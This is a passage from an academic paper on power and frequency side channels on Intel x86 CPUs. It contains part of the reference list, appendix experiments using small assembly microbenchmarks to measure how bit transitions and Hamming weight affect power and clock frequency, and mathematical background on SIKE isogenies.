Daniel Gruss. PLATYPUS: Software- based power side-channel attacks on x86. In S&P, 2021. [65] Chen Liu, Abhishek Chakraborty, Nikhil Chawla, and Neer Roggel. Frequency throttling side-channel attack. Preprint, arXiv:2206.07012 [cs.CR], 2022. [66] Patrick Longa. Post-quantum Cryptography. Microsoft, 2019. Avail- able at https://github.com/microsoft/PQCrypto-SIDH. Ac- cessed on Jun 7, 2022. [67] Stefan Mangard. A simple power-analysis (SPA) attack on implemen- tations of the AES key expansion. In ICISC, 2002. [68] Stefan Mangard, Elisabeth Oswald, and Thomas Popp. Power Analysis Attacks: Revealing the Secrets of Smart Cards, volume 31. Springer Science & Business Media, 2008. [69] Stefan Mangard, Norbert Pramstaller, and Elisabeth Oswald. Success- fully attacking masked AES hardware implementations. In CHES, 2005. [70] Heiko Mantel, Johannes Schickel, Alexandra Weber, and Friedrich Weber. How secure is green IT? the case of software-based energy side channels. In ESORICS, 2018. [71] Rita Mayer-Sommer. Smartly analyzing the simplicity and the power of simple power analysis on smartcards. In CHES, 2000. [72] David McCann, Elisabeth Oswald, and Carolyn Whitnall. Towards practical tools for side channel aware software engineering:’grey box’modelling for instruction leakages. In USENIX Security, 2017. [73] Thomas Messerges. Using second-order power analysis to attack DPA resistant software. In CHES, 2000. [74] Thomas Messerges, Ezzy Dabbish, and Robert Sloan. Investigations of power analysis attacks on smartcards. In USENIX Smartcard, 1999. [75] Thomas Messerges, Ezzy Dabbish, and Robert Sloan. Power analysis attacks of modular exponentiation in smartcards. In CHES, 1999. [76] Yan Michalevsky, Aaron Schulman, Gunaa Arumugam Veerapandian, Dan Boneh, and Gabi Nakibly. PowerSpy: Location tracking using mobile device power analysis. In USENIX Security, 2015. [77] Jeremy Morse, Steve Kerrison, and Kerstin Eder. On the limitations of analyzing worst-case dynamic energy of processing. ACM Transactions on Embedded Computing Systems (TECS), 17(3):1–22, 2018. [78] Hassan Mujtaba. [IDF15]Intel’s 6th gen Skylake unwrapped - CPU microarchitecture, Gen9 graphics core and Speed Shift hardware P- state. https://wccftech.com/idf15-intel-skylake-analysis- cpu-gpu-microarchitecture-ddr4-memory-impact/4/, 2015. Accessed on Jun 7, 2022. [79] Svetla Nikova, Christian Rechberger, and Vincent Rijmen. Threshold implementations against side-channel attacks and glitches. In ICICS, 2006. [80] Roman Novak. SPA-based adaptive chosen-ciphertext attack on RSA implementation. In PKC, 2002. [81] Kostas Papagiannopoulos and Nikita Veshchikov. Mind the gap: To- wards secure 1st-order masking in software. In COSADE, 2017. [82] Matthieu Rivain and Emmanuel Prouff. Provably secure higher-order masking of AES. In CHES, 2010. [83] Erkay Savas and Çetin Kaya Koç. Montgomery inversion. J. Cryptogr. Eng., 8(3), 2018. [84] Werner Schindler and Andreas Wiemers. Power attacks in the presence of exponent blinding. J. Cryptogr. Eng., 4(4), 2014. [85] Werner Schindler and Andreas Wiemers. Generic power attacks on RSA with CRT and exponent blinding: new results. J. Cryptogr. Eng., 7(4), 2017. [86] Kai Schramm and Christof Paar. Higher order masking of the AES. In CT-RSA, 2006. [87] Madura A Shelton, Niels Samwel, Lejla Batina, Francesco Regazzoni, Markus Wagner, and Yuval Yarom. Rosita: Towards automatic elimina- tion of power-analysis leakage in ciphers. NDSS, 2021. [88] Ankush Varma, Eric Debes, Igor Kozintsev, and Bruce Jacob. Instruction-level power dissipation in the Intel XScale embedded mi- croprocessor. In Embedded Processors for Multimedia and Communi- cations II, 2005. [89] Nikita Veshchikov. SILK: high level of abstraction leakage simulator for side channel analysis. In PPREW, 2014. [90] Vince Weaver. Reading RAPL energy measurements from linux. http: //web.eece.maine.edu/~vweaver/projects/rapl/. Accessed on Jun 7, 2022. [91] Rafael J. Wysocki. intel_pstate CPU performance scaling driver. https://www.kernel.org/doc/html/v4.19/admin-guide/pm/i ntel_pstate.html. Accessed on Jun 7, 2022. [92] Lin Yan, Yao Guo, Xiangqun Chen, and Hong Mei. A study on power side channels on mobile devices. In Internetware, 2015. [93] Qing Yang, Paolo Gasti, Gang Zhou, Aydin Farajidavar, and Kiran Balagani. On inferring browsing activity on smartphones via USB power analysis side-channel. IEEE Trans. Inf. Forensics Secur., 12(5), 2016. [94] Sung-Ming Yen, Wei-Chih Lien, SangJae Moon, and JaeCheol Ha. Power analysis by exploiting chosen message and internal collisions - vulnerability of checking mechanism for RSA-decryption. In Mycrypt, 2005. [95] Zhenkai Zhang, Sisheng Liang, Fan Yao, and Xing Gao. Red alert for power leakage: Exploiting Intel RAPL-induced side channels. In ASIACCS, 2021. A Appendix A.1 Leakage Model—Additional Experiments HD in the ALU Input In Section 4.1, we saw that increas- ing the number of bit transitions in the ALU output causes an increase in power consumption and a decrease in frequency. Here, we set out to understand if the same effect happens when bit transitions occur in the ALU input. We need a sender that offers fine-grained control over the number of transitions in the ALU input, while avoiding potential side-effects such as the HW effect or bit transitions in the ALU output. We design a sender that is symmetric to the one of Figure 3a. Our sender still uses shlx and shrx instructions, as shown in Figure 13a. However, it is designed such that the output of all shlx and shrx instructions is always the same, and only their input varies as a function of COUNT. Hence, any HD effect is caused by bit transitions on the ALU input only. For example, when COUNT = 8, the source register to each shlx contains 0x000000ffffffff00, and the source register to each shrx contains 0x00ffffffff000000, the alternation of which translates to a HD of 4×8 in the ALU input. Figure 14 shows the results for increasing COUNT values. We see that the power consumption grows and the frequency drops when COUNT grows, confirming that the number of bit transitions (i.e., the HD) in the ALU input directly affects power consumption and CPU frequency. We also see that the changes in power / frequency become more significant when rax = COUNT rbx = 0x0000FFFFFFFF0000 >> COUNT rcx = 0x0000FFFFFFFF0000 << COUNT loop: shlx %rax,%rbx,%rdx // rdx = rbx << rax shlx %rax,%rbx,%rsi // rsi = rbx << rax shrx %rax,%rcx,%rdi // rdi = rcx >> rax shrx %rax,%rcx,%r8 // r8 = rcx >> rax shlx %rax,%rbx,%r9 // r9 = rbx << rax shlx %rax,%rbx,%r10 // r10 = rbx << rax shrx %rax,%rcx,%r11 // r11 = rcx >> rax shrx %rax,%rcx,%r12 // r12 = rcx >> rax jmp loop (a) Variant of sender for the HD experiments. rax = 1 rsp = pointer_to_memory rbx = … = r15 = INPUT loop: mov %rax,(%rsp) // store rax to memory mov %rax,(%rsp) // store rax to memory mov %rax,(%rsp) // store rax to memory mov %rax,(%rsp) // store rax to memory mov %rax,(%rsp) // store rax to memory mov %rax,(%rsp) // store rax to memory mov %rax,(%rsp) // store rax to memory mov %rax,(%rsp) // store rax to memory jmp loop (b) Sender for the HW at rest experiments. Figure 13: Additional sets of instructions (senders) used to reverse engineer the dependency between data and power consumption / frequency on our CPUs. Different senders are designed to target different effects. Each sender can be run with variable inputs. 0 5 10 15 COUNT 4.275 4.280 4.285 4.290 4.295 Frequency (GHz) (a) Mean frequencies. 0 5 10 15 COUNT 22.8 22.9 23.0 23.1 Power (W) (b) Mean power consumptions. Figure 14: Effect of increasing COUNT in Figure 13a’s sender on our i7-9700 CPU. Higher COUNT values cause higher HDs in the ALU output. As the HD increases, the mean power con- sumption grows and the mean steady-state frequency drops. the COUNT > 8, as a result of the non-uniform HW cost of having 1s closer to the MSB in the fixed source register rcx. Non-uniform HW In Section 4.2, we saw that the HW ef- fect it depends on the position of 1s in the data (i.e., it is non-uniform). We now discuss two experiments that provide additional evidence that the HW effect is non-uniform. We refer to these experiments as shift0 and shift1 . Both experi- ments use the same sender of Section 4.2, shown in Figure 3b. In shift1 , we fix the number of consecutive 1s and measure the impact of changing the position of these consecutive 1s in the LEFT = RIGHT input, when all surrounding bits are 0s. In shift0 , we do the opposite: we fix the number of con- secutive 0s and measure the impact of changing the position of these consecutive 0s in the LEFT = RIGHT input, when all surrounding bits are 1s. By construction, since the HW is fixed and the sender does not introduce any HD effect, any differences in the results depend only on the position of 1s. We label different positions of the consecutive bit patterns based on their “shift offset” starting from the LSB. For exam- ple, when the number of consecutive 1s in shift1 is 32, a shift offset of 0 refers to input value 0x00000000ffffffff and a shift offset of 16 refers to input value 0x0000ffffffff0000. 20 40 60 Shift Offset 4.12 4.13 4.14 4.15 Frequency (GHz) 8 ones 16 ones 32 ones 48 ones (a) Frequency vs shift offset 20 40 60 Shift Offset 26.4 26.6 26.8 27.0 27.2 Power (W) 8 ones 16 ones 32 ones 48 ones (b) Power vs shift offset Figure 15: Effect of shifting consecutive 1s in the LEFT = RIGHT input to Figure 3b’s sender on our i7-9700 CPU. As we shift the 1s towards the MSB, the mean power consump- tion grows and the mean steady-state frequency drops. Similarly, when the number of consecutive 0s in shift0 is 32, a shift offset of 16 refers to input value 0xffff00000000ffff. Figure 15 shows the results for the shift1 experiment when we fix the number of 1s to 8, 16, 32, or 48. Consider the case when the number of 1s is 16. When the shift offset is between 0 to 16, we see almost no variation in the mean power / frequency. This is because as we shift in this range, 1s are still all the low 32 bits, and we know from Figure 7 that there is little difference in the HW effect for 1s that are in the low 32 bits. However, when the shift offset increases from 16 to 48, the power consumption grows and the frequency drops. This is because we start gaining 1s in the high 32 bits and approaching the MSB. This is consistent with what we saw in Figure 7, where 1s closer to the MSB have a stronger HW effect than 1s closer to the 32nd bit. The results are similar when the number of 1s is 8. When the number of 1s is 32 or 48, the HW effect increases every time the shift offset increases. This is because, in these cases, shifting means that we lose 1s in the low 32 bits and gain 1s in the high 32 bits, and we know from Figure 7 that 1s in the high 32 bits have a stronger HW effect than 1s in the low 32 bits. The HW increments in these cases are also more significant, because the delta between the HW effect of the bits we gain and the bits we lose is larger. 20 40 60 Shift Offset 4.12 4.13 4.14 4.15 Frequency (GHz) 8 zeros 16 zeros 32 zeros 48 zeros (a) Frequency vs shift offset 20 40 60 Shift Offset 26.6 26.8 27.0 27.2 Power (W) 8 zeros 16 zeros 32 zeros 48 zeros (b) Power vs shift offset Figure 16: Effect of shifting consecutive 0s in the LEFT = RIGHT input to Figure 3b’s sender on our i7-9700 CPU. As we shift the 0s towards the MSB, the mean power consump- tion drops and the mean steady-state frequency grows. Figure 16 shows the results for the shift0 experiment. These results are symmetrical to the shift1 ones and can be explained by the same reasons described for the shift1 experiment. In summary, the shift0 and shift1 experiments support our observation that the HW effect is non-uniform. HW Root Cause In Section 4.3, we saw that the HD effect and the HW effect are additive. Recall that the HD effect is due to 1 → 0 and 0 → 1 bit transitions in the data being processed. This is a well-understood effect in the literature, and can be attributed to the fact that when more bits flip during a computation, more transistors are switched in the datapath, which causes dynamic power consumption to grow [46, 68]. However, it is difficult to pinpoint the root cause of the HW effect on x86 Intel CPUs. For example, it is unclear if the HW effect occurs only when data is actively computed on, or if it is due to any data-dependent power cost of simply keeping data stored inside registers. Our sender from Figure 3b cannot distinguish between these two cases because it is designed to continuously compute on and overwrite identical data values. Here, we design a new sender to test if the HW effect occurs also when data values with different HWs are simply stored into registers (at rest), but not actively computed on. Our sender, shown in Figure 13b, is designed as follows. First, it sets the content of rax to 1, rsp to a memory location, and all other architectural registers to a fixed INPUT value. Then, it enters an infinite loop of stores that write the content of rax into the memory location pointed to by rsp. 13 By construction, the store operations in the loop are always the same and independent of the value of INPUT. Changing the value of INPUT only affects the content of registers that are initialized, but not actively computed on by the sender. Any difference in power consumption due to different INPUT values would then be due to HW effect at rest. Figure 17 shows the results when we increase the HW of INPUT from 0 to 64. We see no differences in the mean power consumption and mean steady-state frequency when the HW 13We use a store so that the register file is constantly being read from, in the offchance an inactive register file could be powered down. 0 20 40 60 HW of INPUT 4.33 4.34 4.35 4.36 4.37 Frequency (GHz) (a) Frequency vs HW 0 20 40 60 HW of INPUT 21.2 21.4 21.6 21.8 22.0 Power (W) (b) Power vs HW Figure 17: Effect of increasing the HW of INPUT (at rest) in Figure 13b’s sender on our i7-9700 CPU. As we increase HW from 0 to 64, the mean power consumption and the mean steady-state frequency do not change. grows. This result suggests that the HW effect does not occur when simply keeping data stored inside registers. A.2 Mathematical Preliminaries for SIKE SIKE is an isogeny-based key encapsulation method which in- volves arithmetic operations of elliptic curves over finite fields. In particular, SIKE uses Montgomery elliptic curves. Its se- curity relies on the hardness of finding a specific isogeny be- tween two such elliptic curves. Here, we provide an overview of the details of SIKE that are relevant to our attack.14 Let p be a prime of the form 2 e2 3 e3 − 1. SIKE works in the field Fp 2 = Fp(i) with i 2 = −1 (mod p) and uses the su- persingular elliptic curves over Fp 2 that have (2 e2 3 e3 ) 2 points. The set of points P ∈ E(Fp) that satisfy [n]P = O is called the n-torsion of E. The curves of interest were chosen so that the entire (2 e2 3 e3 )-torsion is already defined over Fp 2 , and we have E[2 e2 3 e3 ] ∼= Z/(2 e2 3 e3 )Z×Z/(2 e2 3 e3 )Z; as a result, for each curve of interest, E[2 e2 ] can be generated by linear combinations of two points P2 and Q2 with coefficients in Fp 2 ; and likewise E[3 e3 ] can be generated by linear combinations of two points P3 and Q3 with coefficients in Fp 2 . An isogeny 𝜙: E1(Fp 2 ) → E2(Fp 2 ) is a group homomor- phism from E1(Fp 2 ) to E2(Fp 2 ) and a non-constant rational map defined over Fp 2 that preserves the point at infinity O. The kernel of an isogeny is ker𝜙 = {P ∈ E1 : 𝜙(P) = O}. Every finite subgroup H of a curve E(Fp 2 ) defines an isogeny 𝜙: E → E/H, unique up to isomorphism, such that ker𝜙 = H. The cardinality of H is also the degree of the ra- tional map 𝜙. Given H, Vélu’s algorithm allows the rational map for the isogeny corresponding to H to be computed; the computation is tractable when |H| is small. An `-isogeny is defined as 𝜙` : E → E/hPi, where P has exact order `. The order of 𝜙(Q) in E/hPi is the same as the order of Q in E unless Q lies above ker𝜙 (meaning that 14For more information on SIKE, we refer to the SIKE tutorial by Costello [19] and to the SIKE specification [52]. For more information on elliptic curves and isogenies, we refer to the pairings tutorial by Costello [18] and to De Feo’s lecture notes [23] and habilitation thesis [24]. For more information on Montgomery ladders, we refer to Bernstein and Lange [6]. Algorithm 2: Computing and evaluating a 3 e -isogeny, simple version ( [52], Appendix A) 1 function 3_e_iso Static parameters: Integer e3 from the public parameters Input: Constants (A + 24 : A − 24) corresponding to a curve EA/C, (XS : ZS) where S has exact order 3e3 on EA/C Output: (A + 24 0 : A − 24 0 ) coresponding to the curve EA0/C0 = E/hSi 1 for e = e3 −1 downto 0 by −1 do 2 (XT : ZT ) ← xTPLe